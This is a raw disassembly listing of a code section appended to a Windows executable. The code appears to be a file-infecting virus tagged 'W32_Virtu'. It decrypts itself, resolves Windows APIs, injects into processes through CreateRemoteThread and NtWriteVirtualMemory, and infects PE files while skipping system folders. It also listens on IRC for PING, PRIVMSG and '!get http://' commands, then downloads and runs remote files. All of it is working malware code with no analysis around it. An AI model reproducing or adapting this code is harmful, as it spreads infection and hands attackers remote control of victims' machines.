; Section size in file : 00006200 ( 25088.)
; Offset to raw data for section: 000DE000
; Flags E0000260: Text Data Comment Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_sxdata segment para public 'CODE' use32
assume cs:_sxdata
;org 4DE000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 127h, 19Ch, 1DCh, 221h, 233h, 290h, 7Ah dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_C = dword ptr -0Ch
var_4 = dword ptr -4
call $+5
push ebp
mov ebx, [esp+8]
mov ebp, [esp+8+var_4]
sub [esp+8+var_4], 0C0032h
and ebx, 0FFFFF000h
sub ebp, offset loc_401005
loc_4DE222: ; CODE XREF: start+3D�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_4DE237
mov eax, [ebx+3Ch]
add eax, ebx
cmp word ptr [eax], 4550h
jz short loc_4DE23F
loc_4DE237: ; CODE XREF: start+29�j
sub ebx, 100h
jmp short loc_4DE222
; ---------------------------------------------------------------------------
loc_4DE23F: ; CODE XREF: start+35�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_4DE24D: ; CODE XREF: start:loc_4DE274�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_4DE274
cmp dword ptr [eax+3], 636F7250h
jnz short loc_4DE274
cmp dword ptr [eax+7], 72646441h
jnz short loc_4DE274
cmp dword ptr [eax+0Bh], 737365h
jz short loc_4DE279
loc_4DE274: ; CODE XREF: start+57�j start+60�j ...
loop loc_4DE24D
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4DE279: ; CODE XREF: start+72�j
sub [esp+0Ch+var_C], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_4DE29F+2
inc ebx
insb
outsd
jnb short near ptr loc_4DE2FD+2
dec eax
popa
outsb
db 64h
insb
loc_4DE29F: ; CODE XREF: start+90�p
add gs:[ebx-1], dl
start endp ; sp-analysis failed
setalc
mov [ebp+402407h], eax
call near ptr loc_4DE2BB+1
inc ebx
jb short loc_4DE317
popa
jz short loc_4DE31A
inc ebp
jbe short near ptr loc_4DE31C+1
outsb
jz short near ptr loc_4DE2FA+2
loc_4DE2BB: ; CODE XREF: .sxdata:004DE2AA�p
add [ebx-1], dl
setalc
mov [ebp+40240Bh], eax
call sub_4DE2D7
inc edi
db 65h
jz short loc_4DE31A
popa
jnb short sub_4DE345
inc ebp
jb short near ptr sub_4DE345+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_4DE2D7 proc near ; CODE XREF: .sxdata:004DE2C5�p
; FUNCTION CHUNK AT 004DE355 SIZE 0000008D BYTES
; FUNCTION CHUNK AT 004DE471 SIZE 000000DD BYTES
push ebx
call esi
mov [ebp+40240Fh], eax
call sub_4DE32A
test eax, eax
jz short loc_4DE30A
push eax
call dword ptr [ebp+40240Fh]
test eax, eax
jnz short loc_4DE304
lea eax, [ebp+401155h]
loc_4DE2FA: ; CODE XREF: .sxdata:004DE2B9�j
mov dl, [eax-1]
loc_4DE2FD: ; CODE XREF: start+98�j
call sub_4DE345
jmp short loc_4DE355
; ---------------------------------------------------------------------------
loc_4DE304: ; CODE XREF: sub_4DE2D7+1B�j
; sub_4DE2D7+E7�j ...
call dword ptr [ebp+402407h]
loc_4DE30A: ; CODE XREF: sub_4DE2D7+10�j
pop ebp
retn
sub_4DE2D7 endp
; ---------------------------------------------------------------------------
loc_4DE30C: ; CODE XREF: sub_4DE32A+2�p
; sub_4DE2D7:loc_4DE4E1�p
pop edx
push 0
push 0
push 0
push 0
; ---------------------------------------------------------------------------
db 68h, 1
; ---------------------------------------------------------------------------
loc_4DE317: ; CODE XREF: .sxdata:004DE2B0�j
add [eax+eax], al
loc_4DE31A: ; CODE XREF: .sxdata:004DE2B3�j
; .sxdata:004DE2CB�j
mov eax, esp
loc_4DE31C: ; CODE XREF: .sxdata:004DE2B6�j
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
push esi
push esp
pop edi
xor eax, [eax]
; =============== S U B R O U T I N E =======================================
sub_4DE32A proc near ; CODE XREF: sub_4DE2D7+9�p
; .sxdata:loc_4DEEDC�p
xor ecx, ecx
call loc_4DE30C
lea edx, [ebp+401125h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+40240Bh]
add esp, 20h
retn
sub_4DE32A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4DE345 proc near ; CODE XREF: .sxdata:004DE2CF�j
; sub_4DE2D7:loc_4DE2FD�p ...
mov dh, dl
mov ecx, 12B2h
loc_4DE34C: ; CODE XREF: sub_4DE345+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_4DE34C
retn
sub_4DE345 endp
; ---------------------------------------------------------------------------
wait
; START OF FUNCTION CHUNK FOR sub_4DE2D7
loc_4DE355: ; CODE XREF: sub_4DE2D7+2B�j
and dword ptr [ebp+401480h], 0
and dword ptr [ebp+401484h], 0
and dword ptr ss:loc_401488[ebp], 0
push edi
mov byte ptr [ebp+401262h], 1
mov dword ptr ss:loc_402413[ebp], esi
lea esi, loc_4014A9[ebp]
xor ecx, ecx
lea edi, loc_402423[ebp]
mov cl, 1Ch
call sub_4DE68C
pop edi
call dword ptr [ebp+40245Bh]
shr eax, 1Fh
jz loc_4DE471
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+40241Bh], eax
push 5839h
push 0
call dword ptr [ebp+40248Bh]
test eax, eax
jz loc_4DE304
xchg eax, edi
lea esi, sub_401000[ebp]
mov ebp, edi
mov ecx, 60Fh
sub ebp, offset sub_401000
lea edx, loc_4011E2[ebp]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_4DE2D7
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+4018D1h]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+40241Bh]
add esp, 20h
test eax, eax
jz loc_4DE304
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+40241Bh]
test eax, eax
jz loc_4DE304
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+40241Bh]
push 1000Ah
call dword ptr [ebp+40241Bh]
call sub_4DE461
jmp loc_4DE304
; =============== S U B R O U T I N E =======================================
sub_4DE461 proc near ; CODE XREF: .sxdata:004DE457�p
; sub_4DE461+D�j
push 1
pop ecx
jecxz short locret_4DE470
push 0Ah
call dword ptr [ebp+402483h]
jmp short sub_4DE461
; ---------------------------------------------------------------------------
locret_4DE470: ; CODE XREF: sub_4DE461+3�j
retn
sub_4DE461 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4DE2D7
loc_4DE471: ; CODE XREF: sub_4DE2D7+C0�j
cmp dword ptr [ebp+40243Bh], 0
jz loc_4DE304
call near ptr loc_4DE488+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_4DE488: ; CODE XREF: sub_4DE2D7+1A7�p
add bh, bh
xchg eax, ebp
dec edi
and al, 40h
add [ebp+401637B5h], cl
add [ebx], dh
leave
lea edi, loc_402493[ebp]
mov cl, 9
xchg eax, ebx
call sub_4DE68C
cmp dword ptr [ebp+4024B3h], 0
jz loc_4DE304
mov eax, [ebp+402497h]
push dword ptr [eax+1]
pop dword ptr [ebp+4023C1h]
mov eax, [ebp+40249Bh]
push dword ptr [eax+1]
pop dword ptr [ebp+4023C7h]
mov ecx, [ebp+40249Fh]
jecxz short loc_4DE4E1
push dword ptr [ecx+1]
pop dword ptr [ebp+4023D4h]
loc_4DE4E1: ; CODE XREF: sub_4DE2D7+1FF�j
call loc_4DE30C
lea edx, [ebp+40149Fh]
push edx
push 5839h
push 0
push 4
push eax
push 0FFFFFFFFh
call dword ptr ss:loc_40242B[ebp]
add esp, 20h
push 5839h
mov edx, esp
push 0
mov ecx, esp
push 4
push 0
push 2
push edx
push 0
push 5839h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+4024A3h]
pop edi
pop ecx
test edi, edi
jz loc_4DE304
lea esi, sub_401000[ebp]
mov ecx, 60Fh
mov ebp, edi
rep movsd
sub ebp, offset sub_401000
lea eax, loc_40134E[ebp]
jmp eax
; END OF FUNCTION CHUNK FOR sub_4DE2D7
; ---------------------------------------------------------------------------
dw 958Dh
dd offset loc_401789
dd 6395FF52h, 0E8004024h, 16h
aLookupprivil_0 db 'LookupPrivilegeValueA',0
dw 0FF50h
dd 40241395h, 17858900h, 50004024h, 6A206A54h, 0A795FFFFh
dd 85004024h, 3F755FC0h, 56026A96h, 6AD48B56h, 11E85201h
dd 53000000h, 62654465h, 72506775h, 6C697669h, 656765h
dd 1795FF56h, 8B004024h, 565656C4h, 0FF575650h, 40249395h
dd 10C48300h, 795FF57h, 6A004024h, 0FF026A00h, 40243B95h
dd 128B900h, 2B970000h, 240C89E1h, 95FF5754h, 402473h
dd 0A583F633h, 4024F7h, 0FF575400h, 40247795h, 74C08500h
dd 0FE83465Ch, 0FFEE7204h, 6A082474h, 0FF2A6A00h, 40246F95h
dd 74C08500h, 0E4E893DCh, 33000003h, 30E391C9h, 24F78539h
dd 28750040h, 0C3EC181h, 54500000h, 50515650h, 95FF5350h
dd 402433h, 7459C085h, 2474FF0Fh, 0F7858F08h, 0E8004024h
dd 0FFFFFE09h, 795FF53h, 0EB004024h, 28C48198h, 57000001h
dd 240795FFh, 91E90040h, 90FFFFFCh, 585858h, 1839h, 0BF4h
dd 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_4DE68C proc near ; CODE XREF: sub_4DE2D7+B1�p
; sub_4DE2D7+1C9�p ...
push ecx
push esi
push ebx
call dword ptr ss:loc_402413[ebp]
stosd
pop ecx
loc_4DE697: ; CODE XREF: sub_4DE68C+E�j
lodsb
test al, al
jnz short loc_4DE697
loop sub_4DE68C
retn
sub_4DE68C endp
; ---------------------------------------------------------------------------
aW32_virtu db 'W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea_0 db 'CreateFileA',0
aCreatefilema_0 db 'CreateFileMappingA',0
aCreateproces_0 db 'CreateProcessA',0
aCreateremoteth db 'CreateRemoteThread',0
aCreatethread_0 db 'CreateThread',0
aCreatetoolhe_0 db 'CreateToolhelp32Snapshot',0
aExitthread_0 db 'ExitThread',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime_0 db 'GetFileTime',0
aGetmodulehan_0 db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha_0 db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionex_0 db 'GetVersionExA',0
aLoadlibrarya_0 db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess_0 db 'OpenProcess',0
aProcess32fir_0 db 'Process32First',0
aProcess32nex_0 db 'Process32Next',0
aSetfileattri_0 db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile_0 db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup_0 db 'WSAStartup',0
aClosesocket_0 db 'closesocket',0
aConnect_0 db 'connect',0
aGethostbynam_0 db 'gethostbyname',0
aRecv_0 db 'recv',0
aSend_1 db 'send',0
aSocket_0 db 'socket',0
aInternetclos_0 db 'InternetCloseHandle',0
aInternetgetc_1 db 'InternetGetConnectedState',0
aInternetopen_0 db 'InternetOpenA',0
aInternetopen_1 db 'InternetOpenUrlA',0
aInternetread_0 db 'InternetReadFile',0
aAdvapi32_dll_0 db 'ADVAPI32.DLL',0
aRegclosekey_0 db 'RegCloseKey',0
aRegopenkeyex_0 db 'RegOpenKeyExA',0
aRegqueryvalu_0 db 'RegQueryValueExA',0
aRegsetvaluee_0 db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_4DE9D0 proc near ; CODE XREF: .sxdata:004DEA73�p
; .sxdata:004DEA84�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr ss:loc_4024AB[ebp]
add esp, 0Ch
call dword ptr [ebp+4024AFh]
add esp, 8
retn
sub_4DE9D0 endp
; ---------------------------------------------------------------------------
push edi
lea eax, [ebp+40149Fh]
xor edi, edi
push eax
push 0
push 6
call dword ptr [ebp+40246Bh]
test eax, eax
jz short loc_4DEA9E
push eax
push 5839h
mov edx, esp
push 0
mov ecx, esp
push 4
push 100000h
push 2
push edx
push 0
push 5839h
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4024A3h]
pop edi
pop ecx
call dword ptr [ebp+402407h]
test edi, edi
jz short loc_4DEA9E
mov ecx, dword ptr ss:loc_401488[ebp]
jecxz short loc_4DEA67
lea edx, sub_401000[ebp]
add edx, ecx
push edi
push ebx
call edx
loc_4DEA67: ; CODE XREF: .sxdata:004DEA59�j
mov eax, [ebp+402497h]
lea ecx, [edi+1379h]
call sub_4DE9D0
mov eax, [ebp+40249Bh]
lea ecx, [edi+13C6h]
call sub_4DE9D0
mov eax, [ebp+40249Fh]
test eax, eax
jz short loc_4DEA9E
lea ecx, [edi+13D3h]
call sub_4DE9D0
loc_4DEA9E: ; CODE XREF: .sxdata:004DEA1D�j
; .sxdata:004DEA51�j ...
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 4018A8h
xor ecx, ecx
lea eax, loc_401C3E[ebp]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+402437h]
xchg eax, [esp]
call dword ptr [ebp+402407h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 18D7ED81h, 0FF6A0040h, 18A2958Dh, 52500040h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 4018E8h, 85C720CDh
dd 4018EAh, 2A0024h, 16AC35Dh, 33FF016Ah, 0FF0473FFh, 74C08515h
dd 0B68F0h, 0D08B0000h, 3C50035Bh, 1906B58Dh, 0BA8B0040h
dd 10Ch, 1088A8Bh, 0F8030000h, 8B60CB2Bh, 61A6F3CBh, 0E2470574h
dd 83C2EBF5h, 8B570FC7h, 0CC8B53D4h, 406A5450h, 0FF6A5251h
dd 24AB95FFh, 0C4830040h, 3F958B0Ch, 2B004024h, 7EA83D7h
dd 6A07C7h, 578900E8h, 9569C303h, 402501h, 8088405h, 0B042C033h
dd 195891Ah, 0F7004025h, 61428DE2h, 75C9FEAAh, 0E855C3E1h
dd 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 401998h
mov ebx, [ebp+402505h]
cmp dword ptr [esp+8], 0
jz loc_4DEC69
sub esp, 208h
push esp
push 104h
call dword ptr [ebp+402457h]
mov edi, esp
lea eax, [esp+104h]
push eax
push 0
call near ptr loc_4DEBD6+1
push esi
push edx
push esp
loc_4DEBD6: ; CODE XREF: .sxdata:004DEBCE�p
add [edi-1], dl
xchg eax, ebp
push ebx
and al, 40h
add [ebx], dh
leave
lea edx, [edi+104h]
push ecx
push ecx
push 2
push ecx
push 1
push 40000000h
push edx
call dword ptr [ebp+402427h]
xchg eax, esi
test esi, esi
jz short loc_4DEC59
loc_4DEBFE: ; CODE XREF: .sxdata:004DEC2C�j
push eax
push esp
push 104h
push edi
push dword ptr [esp+220h]
call dword ptr [ebp+4024E3h]
pop ecx
test eax, eax
jz short loc_4DEC2E
jecxz short loc_4DEC2E
push eax
mov edx, esp
push 0
push edx
push ecx
push edi
push esi
call dword ptr [ebp+40248Fh]
pop ecx
test eax, eax
jnz short loc_4DEBFE
loc_4DEC2E: ; CODE XREF: .sxdata:004DEC16�j
; .sxdata:004DEC18�j
push esi
call dword ptr [ebp+402407h]
lea edx, [edi+44h]
push edx
push edi
push 44h
pop eax
lea edx, [edi+104h]
stosd
xor eax, eax
push 10h
pop ecx
rep stosd
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push edx
call dword ptr [ebp+40242Fh]
loc_4DEC59: ; CODE XREF: .sxdata:004DEBFC�j
add esp, 208h
push dword ptr [esp+8]
call dword ptr [ebp+4024D3h]
loc_4DEC69: ; CODE XREF: .sxdata:004DEBAA�j
push ebx
call dword ptr [ebp+4024D3h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
cmp byte ptr [esi], 0Ah
jnz short loc_4DEC7A
inc esi
loc_4DEC7A: ; CODE XREF: .sxdata:004DEC77�j
mov ecx, [ebp+401484h]
jecxz short loc_4DEC9B
lea edx, sub_401000[ebp]
add edx, ecx
push esi
call edx
test al, al
js loc_4DEDB4
jz loc_4DEDAB
loc_4DEC9B: ; CODE XREF: .sxdata:004DEC80�j
cmp byte ptr [esi], 3Ah
jnz short loc_4DECB0
loc_4DECA0: ; CODE XREF: .sxdata:004DECAD�j
inc esi
cmp byte ptr [esi], 0
jz loc_4DEDAB
cmp byte ptr [esi], 20h
jnz short loc_4DECA0
inc esi
loc_4DECB0: ; CODE XREF: .sxdata:004DEC9E�j
cmp dword ptr [esi], 474E4950h
jnz short loc_4DECFA
mov ecx, edi
mov byte ptr [esi+1], 4Fh
sub ecx, esi
push ecx
push 0
push ecx
push esi
push ebx
call dword ptr [ebp+4024CBh]
pop ecx
cmp eax, ecx
jnz loc_4DEDB4
lea eax, [ebp+401C32h]
push 0
push 0Ch
push eax
push ebx
call dword ptr [ebp+4024CBh]
cmp eax, 0Ch
jnz loc_4DEDB4
jmp loc_4DEDAB
; ---------------------------------------------------------------------------
loc_4DECFA: ; CODE XREF: .sxdata:004DECB6�j
cmp dword ptr [esi], 56495250h
jnz loc_4DEDAB
add esi, 8
loc_4DED09: ; CODE XREF: .sxdata:004DED14�j
lodsb
cmp al, 0Dh
jz loc_4DEDAB
cmp al, 20h
jnz short loc_4DED09
lodsb
cmp al, 3Ah
jnz loc_4DEDAB
lodsd
or eax, 20202020h
cmp eax, 74656721h
jnz short loc_4DEDAB
lodsb
cmp al, 20h
jnz short loc_4DEDAD
cmp dword ptr [esi-1], 74746820h
jnz short loc_4DEDAB
cmp dword ptr [esi+3], 2F2F3A70h
jnz short loc_4DEDAB
mov byte ptr [edi-1], 0
rdtsc
mov edx, 2710h
mul edx
push edx
call dword ptr [ebp+402483h]
xor eax, eax
push eax
push eax
push eax
push eax
call near ptr loc_4DED69+2
inc esp
outsd
ja short loc_4DEDD4
insb
outsd
popa
loc_4DED69: ; CODE XREF: .sxdata:004DED5D�p
db 64h
add bh, bh
xchg eax, ebp
; ---------------------------------------------------------------------------
dd offset loc_4024D6+5
; ---------------------------------------------------------------------------
test eax, eax
jz short loc_4DEDAB
xor ecx, ecx
mov [ebp+402505h], eax
push ecx
push 80000200h
push ecx
push ecx
push esi
push eax
call dword ptr [ebp+4024DFh]
lea edx, loc_401992[ebp]
push eax
xor ecx, ecx
push esp
push ecx
push eax
push edx
push ecx
push ecx
call dword ptr [ebp+402437h]
xchg eax, [esp]
call dword ptr [ebp+402407h]
loc_4DEDAB: ; CODE XREF: .sxdata:004DEC95�j
; .sxdata:004DECA4�j ...
clc
retn
; ---------------------------------------------------------------------------
loc_4DEDAD: ; CODE XREF: .sxdata:004DED2F�j
or byte ptr [ebp+401477h], 1
loc_4DEDB4: ; CODE XREF: .sxdata:004DEC8F�j
; .sxdata:004DECCF�j ...
stc
retn
; ---------------------------------------------------------------------------
dw 4F53h
dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch
dd 73776F64h, 7275435Ch
; ---------------------------------------------------------------------------
loc_4DEDD4: ; CODE XREF: .sxdata:004DED64�j
jb short near ptr loc_4DEE3A+1
outsb
jz short loc_4DEE2F
db 65h
jb short near ptr loc_4DEE4B+4
imul ebp, [edi+6Eh], 7078455Ch
insb
outsd
jb short near ptr loc_4DEE4B+1
jb short $+2
push ebp
outsb
imul esi, [ecx+75h], 736F4865h
jz short $+2
add al, [eax]
push eax
jg short $+2
add [ecx], al
jo short loc_4DEE70
outsd
js short near ptr loc_4DEE69+1
insd
popa
imul esi, cs:[edx+63h], 616C6167h
js short near ptr loc_4DEE85+1
db 2Eh
jo short loc_4DEE7C
add [esi+49h], cl
inc ebx
dec ebx
and [ecx+77h], ch
jns short near ptr loc_4DEE7F+2
push 73h
bound ebp, [edx+ecx+55h]
push ebx
inc ebp
push edx
and [ecx+30h], ch
xor dh, [eax]
xor eax, 2E203130h
and [esi], ch
loc_4DEE2F: ; CODE XREF: .sxdata:004DEDD7�j
and [edx], bh
pop edi
dec edx
dec edi
dec ecx
dec esi
and [esi], ah
jbe short near ptr loc_4DEEA2+1
loc_4DEE3A: ; CODE XREF: .sxdata:loc_4DEDD4�j
jb short near ptr loc_4DEEAF+1
jnz short near ptr loc_4DEE45+3
push ebp
call $+5
pop ebp
loc_4DEE45: ; CODE XREF: .sxdata:004DEE3C�j
sub ebp, 401C44h
loc_4DEE4B: ; CODE XREF: .sxdata:004DEDE5�j
; .sxdata:004DEDD9�j
mov byte ptr [ebp+401477h], 0
call dword ptr [ebp+40245Bh]
shr eax, 1Fh
jz short loc_4DEE99
push 1Eh
mov esi, [ebp+40241Bh]
pop ecx
loc_4DEE66: ; CODE XREF: .sxdata:loc_4DEE95�j
lodsb
cmp al, 2Eh
loc_4DEE69: ; CODE XREF: .sxdata:004DEDFF�j
jnz short loc_4DEE95
cmp word ptr [esi], 1DFFh
loc_4DEE70: ; CODE XREF: .sxdata:004DEDFC�j
jnz short loc_4DEE95
lea edi, [ebp+4024FBh]
mov esi, [esi+2]
push edi
loc_4DEE7C: ; CODE XREF: .sxdata:004DEE0D�j
movsd
movsw
loc_4DEE7F: ; CODE XREF: .sxdata:004DEE18�j
lea eax, loc_40234F[ebp]
loc_4DEE85: ; CODE XREF: .sxdata:004DEE0B�j
pop dword ptr [ebp+402375h]
cli
mov [esi-6], eax
mov word ptr [esi-2], cs
sti
mov cl, 1
loc_4DEE95: ; CODE XREF: .sxdata:loc_4DEE69�j
; .sxdata:loc_4DEE70�j
loop loc_4DEE66
jmp short loc_4DEEDC
; ---------------------------------------------------------------------------
loc_4DEE99: ; CODE XREF: .sxdata:004DEE5B�j
lea eax, [ebp+40149Fh]
push eax
push 0
loc_4DEEA2: ; CODE XREF: .sxdata:004DEE38�j
push 6
call dword ptr [ebp+40246Bh]
cmp dword ptr [esp+8], 4
loc_4DEEAF: ; CODE XREF: .sxdata:loc_4DEE3A�j
jnz short loc_4DEEDC
call near ptr loc_4DEEB9+1
push ebx
inc esi
inc ebx
loc_4DEEB9: ; CODE XREF: .sxdata:004DEEB1�p
add bh, bh
xchg eax, ebp
dec edi
and al, 40h
add al, ch
dec esp
cld
; ---------------------------------------------------------------------------
db 0FFh
dd 7E8FFh, 46530000h, 534F5F43h, 4F95FF00h, 0E8004024h
dd 0FFFFFC35h
; ---------------------------------------------------------------------------
loc_4DEEDC: ; CODE XREF: .sxdata:004DEE97�j
; .sxdata:loc_4DEEAF�j
call sub_4DE32A
dec dword ptr [ebp+401262h]
call near ptr loc_4DEEF6+1
push ebp
push ebx
inc ebp
push edx
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_4DEEF6: ; CODE XREF: .sxdata:004DEEE7�p
add bh, bh
xchg eax, ebp
arpl [eax+eax*2], sp
add al, ch
or al, [eax]
; ---------------------------------------------------------------------------
dd 73770000h, 6E697270h, 416674h, 1395FF50h, 89004024h
dd 40241F85h, 8D310F00h, 4017898Dh, 1858900h, 51004025h
dd 246395FFh, 68930040h, 4, 1796B58Dh, 8D590040h, 4024E7BDh
dd 0F746E800h, 0C766FFFFh, 401BF685h, 83F0FF00h, 401BF8A5h
dd 958D0000h, 401BB6h, 16A5450h, 6852006Ah, 80000002h
dd 24EB95FFh, 0C0850040h, 8D22755Ah, 401BE98Dh, 66A5200h
dd 1BF6B58Dh, 56540040h, 52515050h, 24EF95FFh, 0FF580040h
dd 4024E795h, 885C600h, 4027h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 6395FF00h, 93004024h, 768h, 0EDB58D00h, 59004016h
dd 24B7BD8Dh, 0C1E80040h, 0E8FFFFF6h, 0Ch, 494E4957h, 2E54454Eh
dd 4C4C44h, 246395FFh, 0C0850040h, 1E7840Fh, 68930000h
dd 5, 172BB58Dh, 8D590040h, 4024D3BDh, 0F68AE800h, 0BD83FFFFh
dd 4024D7h, 0C2840F00h, 81000001h, 190ECh, 1685400h, 0FF000001h
dd 4024B795h, 90C48100h, 50000001h, 6AD48Bh, 0D795FF52h
dd 85004024h, 0D7559C0h, 138868h, 8395FF00h, 0EB004024h
dd 0F8BD83E2h, 401Bh, 858D2975h, 401BFCh, 0C395FF50h, 85004024h
dd 3B840FC0h, 8B000001h, 8B0C40h, 858F30FFh, 401BF8h, 270885C6h
dd 6A010040h, 6A016A00h, 0CF95FF02h, 83004024h, 840FFFF8h
dd 112h, 0F4958D93h, 6A00401Bh, 0FF535210h, 4024BF95h
dd 0FC08500h, 0F285h, 16BD8D00h, 0B100401Ch, 0FAC0E808h
dd 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h, 40245Fh
dd 1C24BD8Dh, 1B10040h, 0FFFAA1E8h, 24448BFFh, 8E0C110h
dd 424440Bh, 0B08E0C1h, 50082444h, 5E8h, 362E2500h, 0FF570078h
dd 40241F95h, 0CC48300h, 200647C6h, 1C11958Dh, 6A0040h
dd 2168h, 0FF535200h, 4024CB95h, 247C8D00h, 95FF5714h
dd 402423h, 0A3804C6h, 50006A40h, 95FF5357h, 4024CBh, 0BD8DE603h
dd 401C32h, 0C68006Ah, 57000000h, 0CB95FF53h, 3D004024h
dd 0Ch, 0B58D4D75h, 402509h, 27088D8Dh, 0CE2B0040h, 5651006Ah
dd 0C795FF53h, 83004024h, 2F7E00F8h, 8DFE8B91h, 402509B5h
dd 0F20DB000h, 601075AEh, 0FFFAF7E8h, 177261FFh, 778D09E3h
dd 8BEAEB01h, 8DCE2BCFh, 402509BDh, 87A4F300h, 53B9EBF7h
dd 24BB95FFh, 0BD800040h, 401477h, 682A7401h, 7530h, 248395FFh
dd 0BD800040h, 402708h, 0C7117400h, 401BF885h, 0
dd 885C600h, 4027h, 0FFFE56E9h, 8085C7FFh, 4014h, 5D800000h
dd 8D0004C2h, 402709B5h, 95FF5600h, 402443h, 0FFFF883h
dd 0BB84h, 0D858900h, 6A004028h, 95FF5600h, 40247Bh, 840FC085h
dd 0A4h, 5050C02Bh, 6A50036Ah, 6801h, 0FF56C000h, 40242795h
dd 0FFF88300h, 2E4840Fh, 85890000h, 402811h, 28158D8Dh
dd 958D0040h, 40281Dh, 6A5251h, 4B95FF50h, 83004024h, 840FFFF8h
dd 2B2h, 0B5FF006Ah, 402811h, 244795FFh, 0F8830040h, 9B840FFFh
dd 89000002h, 40282585h, 3C93300h, 515051C3h, 0FF51046Ah
dd 402811B5h, 2B95FF00h, 85004024h, 77840FC0h, 33000002h
dd 298589C9h, 51004028h, 1F685151h, 50000F00h, 246795FFh
dd 0C0850040h, 230840Fh, 85890000h, 40282Dh, 384B8BC3h
dd 5838B8h, 3D23300h, 0F7F1F7C1h, 358589E1h, 8B004028h
dd 6B83C4Bh, 33000014h, 0F7C103D2h, 89E1F7F1h, 40283185h
dd 0B70FC300h, 0E3F9064Bh, 18538D36h, 1443B70Fh, 6B49D003h
dd 0D00328C1h, 775F3A81h, 74F96E69h, 7A83491Eh, 0DF72010Ch
dd 8B3C4B8Bh, 42031442h, 48448D10h, 23D9F7FFh, 25853BC1h
dd 0C3004028h, 24448B59h, 0B888890Ch, 33000000h, 0CF8BC3C0h
dd 0BD8D0BEBh, 402709h, 33DF8BFCh, 613CACC9h, 7A3C0672h
dd 202C0277h, 745C3CAAh, 742E3CECh, 75003CDDh, 8BC8E3E8h
dd 58453D01h, 0B740045h, 5243533Dh, 49850F00h, 8BFFFFFFh
dd 49573D03h, 840F434Eh, 0FFFFFF3Ch, 5543573Dh, 31840F4Eh
dd 3DFFFFFFh, 32334357h, 0FF26840Fh, 503DFFFFh, 0F4F5453h
dd 0FFFF1B84h, 0E8DB33FFh, 0FFFFFE43h, 0FF0E840Fh, 0D233FFFFh
dd 16E8h, 0FF6EE800h, 0E8FFFFh, 5D000000h, 21B3ED81h, 0F9E90040h
dd 64000000h, 0B58B32FFh, 40282Dh, 66228964h, 5A4D3E81h
dd 0E2850Fh, 5E8B0000h, 66DE033Ch, 45503B81h, 0D2850Fh
dd 43F70000h, 200016h, 0C5850F00h, 0F6000000h, 0F025C43h
dd 0BB84h, 207E8100h, 20202020h, 0AE840Fh, 0CFE80000h
